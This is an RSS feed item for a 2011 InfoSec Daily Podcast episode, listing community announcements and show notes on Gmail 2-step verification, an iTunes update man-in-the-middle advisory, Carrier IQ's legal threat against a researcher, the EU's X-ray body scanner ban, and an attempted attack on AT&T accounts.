	</item>
		<item>
		<title>Episode 529 &#8211; Friendly Google PSA, iTunes MitM, CIQ and Desist, Banned Scanners &amp; AT&amp;T</title>
		<link>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att</link>
		<comments>http://www.isdpodcast.com/episode-529-friendly-google-psa-itunes-mitm-ciq-and-desist-banned-scanners-att#comments</comments>
		<pubDate>Wed, 23 Nov 2011 01:53:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3188</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 529 for November 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 529 for November 22, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/11/22/google-2-step-verification-gmail/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/11/22/google-2-step-verification-gmail/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Did you know that</span><a href="http://mashable.com/category/google/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Google</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> offers 2-step login verification for Gmail accounts? The feature has been around a while, and now Google has written a reminder for all users who need an extra layer of security for their Gmail account and other services connected to it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to logging into Gmail with your email and password, with 2-step verification you&rsquo;ll have to go through the added trouble of entering a code Google will send to your phone. This will &ldquo;approve&rdquo; the computer you&rsquo;re currently logging in from for 30 days, so you don&rsquo;t have to do this every time you log in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you have a smartphone, you can also generate the code on your phone using the</span><a href="https://www.google.com/support/a/bin/answer.py?answer=1037451"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Google Authenticator</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> app.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yes, entering an additional code is somewhat of a nuisance, but it would also greatly complicate matters for anyone who has gotten a hold of your password. To successfully log into your Gmail account, that person would also need to obtain your phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its</span><a href="https://plus.google.com/116899029375914044550/posts/HPzUPUk2raS"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Google emphasizes that this reminder is just &ldquo;general security advice, not an indication of an attack or compromise,&rdquo; but one has to wonder if the Redmond giant is seeing an increased number of complaints from users whose Gmail accounts have been compromised.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To enable 2-step verification for Gmail, go</span><a href="http://goo.gl/jEF7l"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://support.apple.com/kb/HT5030"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://support.apple.com/kb/HT5030</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Available for: Mac OS X v10.5 or later, Windows 7, Vista, XP SP2 or later</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Impact: A man-in-the-middle attacker may offer software that appears to originate from Apple</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Description: iTunes periodically checks for software updates using an HTTP request to Apple. This request may cause iTunes to indicate that an update is available. If Apple Software Update for Windows is not installed, clicking the Download iTunes button may open the URL from the HTTP response in the user&#39;s default browser. This issue has been mitigated by using a secured connection when checking for available updates. For OS X systems, the user&#39;s default browser is not used because Apple Software Update is included with OS X, however this change adds additional defense-in-depth.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CVE-2008-3434 : Francisco Amato of Infobyte Security Research</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Link: &nbsp;</span><a href="http://www.infobyte.com.ar/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infobyte.com.ar</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.eff.org/deeplinks/2011/11/carrieriq-censor-research-baseless-legal-threat"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/11/carrieriq-censor-research-baseless-legal-threat</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, security researcher Trevor Eckhart posted an</span><a href="http://androidsecuritytest.com/features/logs-and-services/loggers/carrieriq/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">analysis</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of software produced by Carrier IQ, which</span><a href="http://www.carrieriq.com/company/index.htm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">describes itself</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> as &quot;the world&#39;s leading provider of Mobile Service Intelligence solutions.&quot; Eckhart concluded that the software, which comes by default on many mobile devices and runs quietly in the background, logs extensive details about users&#39; activities. Eckhart not only documented the functionality of the software, but learned even more about how it works through training materials posted on the Carrier IQ website. Fearing the company would take the files offline after he posted his analysis, he mirrored the training materials to let others independently verify his conclusions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Eckhart was right: Carrier IQ immediately made the files unavailable, but it didn&#39;t stop there. &nbsp;Carrier IQ fired off a</span><a href="https://www.eff.org/sites/default/files/eckhart_cease_desist_demand_redacted.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cease-and-desist letter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (pdf) to Eckhart, claiming that he infringed its copyrights and made unspecified &quot;false allegations&quot; about its software. Among other things, the company demanded that Eckhart turn over contact information for every person who had obtained the files from him, and that he replace his analysis with a statement&mdash;written for him by Carrier IQ&mdash;disavowing his research.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Happily, Eckhart was not cowed by this ham-fisted effort to suppress his findings. &nbsp;Instead, he reached out to EFF. &nbsp;We&#39;re glad he did. &nbsp;As we explained in a</span><a href="https://www.eff.org/sites/default/files/eckhart_c%26d_response.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">letter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (pdf) to Carrier IQ today, Eckhart&#39;s research is protected by fair use and the First Amendment right to free expression. He posted the training materials to teach the public about software that many consumers don&#39;t know about, even though it monitors their everyday activities and raises substantial privacy concerns. &nbsp;As the</span><a href="http://www.law.cornell.edu/uscode/17/107.shtml"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Copyright Act says</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, &quot;the fair use of a copyrighted work . . . for purposes such as criticism, comment, news reporting . . . or research, is not an infringement of copyright.&quot; Furthermore, Eckhart&#39;s analysis is just the kind of speech that that the First Amendment is meant to protect&mdash;public commentary that will help consumers better understand the products they use and help researchers investigate those products. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Given the weakness of its legal position, we have to conclude that Carrier IQ&#39;s real goal is to suppress Eckhart&rsquo;s research and prevent others from verifying his findings. But as we&#39;ve long said, the best way to counter speech you don&#39;t like is more speech&mdash;not baseless legal threats to silence your critics. Carrier IQ didn&#39;t get the memo on this. (Nor, apparently, has it heard of the</span><a href="http://en.wikipedia.org/wiki/Streisand_effect"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Streisand Effect</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.) Hopefully it has now. &nbsp;&nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.propublica.org/article/europe-bans-x-ray-body-scanners-used-at-u.s.-airports"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.propublica.org/article/europe-bans-x-ray-body-scanners-used-at-u.s.-airports</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Union on (last)Monday prohibited the use of X-ray body scanners in European airports, parting ways with the U.S. Transportation Security Administration, which has deployed hundreds of the scanners as a way to screen millions of airline passengers for explosives hidden under clothing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The European Commission, which enforces common policies of the EU&#39;s 27 member countries, adopted the rule &ldquo;in order not to risk jeopardizing citizens&rsquo; health and safety.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a ProPublica/PBS NewsHour investigation detailed earlier this month, X-ray body scanners use ionizing radiation, a form of energy that has been shown to damage DNA and cause cancer. Although the amount of radiation is extremely low, equivalent to the radiation a person would receive in a few minutes of flying, several research studies have concluded that a small number of cancer cases would result from scanning hundreds of millions of passengers a year.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">European countries will be allowed to use an alternative body scanner, on that relies on radio frequency waves, which have not been linked to cancer. The TSA has also deployed hundreds of those machines &ndash; known as millimeter-wave scanners &ndash; in U.S. airports. But unlike Europe, it has decided to deploy both types of scanners.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The TSA would not comment specifically on the EU&rsquo;s decision. But in a statement, TSA spokesman Mike McCarthy said, &ldquo;As one of our many layers of security, TSA deploys the most advanced technology available to provide the best opportunity to detect dangerous items, such as explosives.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We rigorously test our technology to ensure it meets our high detection and safety standards before it is placed in airports,&rdquo; he continued. &ldquo;Since January 2010, advanced imaging technology has detected more than 300 dangerous or illegal items on passengers in U.S. airports nationwide.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Body scanners have been controversial in the United States since they were first deployed in prisons in the late 1990s and then in airports for tests after 9/11. Most of the controversy has focused on privacy because the machines can produce graphic images. But the manufacturers have since installed privacy filters.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the TSA began deploying hundreds of body scanners after the failed underwear bombing on Christmas Day 2009, several scientists began to raise concerns about the health risks of the X-ray scanner, noting that even low levels of radiation would increase the risk of cancer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As part of our investigation, ProPublica surveyed foreign countries&rsquo; security policies and found that only a few nations used the X-ray scanner. The United Kingdom uses them but only for secondary screening, such as when a passenger triggers the metal detector or raises suspicion.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Under the new European Commission policy, the U.K. will be allowed to complete a trial of the X-ray scanners but not to deploy them on a permanent basis when the trial ends, said Helen Kearns, spokeswoman for the European transport commissioner, Siim Kallas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;These new rules ensure that where this technology is used it will be covered by EU-wide standards on detection capability as well as strict safeguards to protect health and fundamental rights,&rdquo; Kallas said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Five-hundred body scanners, split about evenly between the two technologies, are deployed in U.S. airports. The X-ray scanner, or backscatter, which looks like two large blue boxes, is used at major airports, including Los Angeles International Airport, John F. Kennedy in New York and Chicago&#39;s O&rsquo;Hare. The millimeter-wave scanner, which looks like a round glass booth, is used in San Francisco, Atlanta and Dallas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Within three years, the TSA plans to deploy 1,800 backscatter and millimeter-wave scanners, covering nearly every domestic airport security lane. The TSA has not yet released details on the exact breakdown.</span></p>
<p>	<a href="http://www.infowars.com/despite-eu-ban-uk-makes-radiation-firing-body-scanners-compulsory/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Update:</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ldquo;In spite of the European Commission formally adopting new limits on airport body scanners and outright banning backscatter x-ray scanners pending further studies, the UK will not allow passengers to &ldquo;opt out&rdquo; if they are selected to go through the machines, which will remain in use.&rdquo; </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/failed-att-hack-attempt-couldve-hit-1-million-customers-112211"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/failed-att-hack-attempt-couldve-hit-1-million-customers-112211</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T announced Monday that hackers made an &ldquo;organized and systematic attempt&rdquo; to gain access to nearly one million of their customers&rsquo; online accounts.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a</span><a href="http://www.bloomberg.com/news/2011-11-21/at-t-tells-customers-of-systematic-hack-attempt.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Bloomberg report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the phone company assured customers in an e-mail their accounts were intact.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We do not believe that the perpetrators of this attack obtained access to your online account or any of the information contained in that account.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While no information appears to have been breached here, AT&amp;T spokesman Mark Siegel announced the company has launched an ongoing investigation to further identify the hack&rsquo;s intent.</span><br />
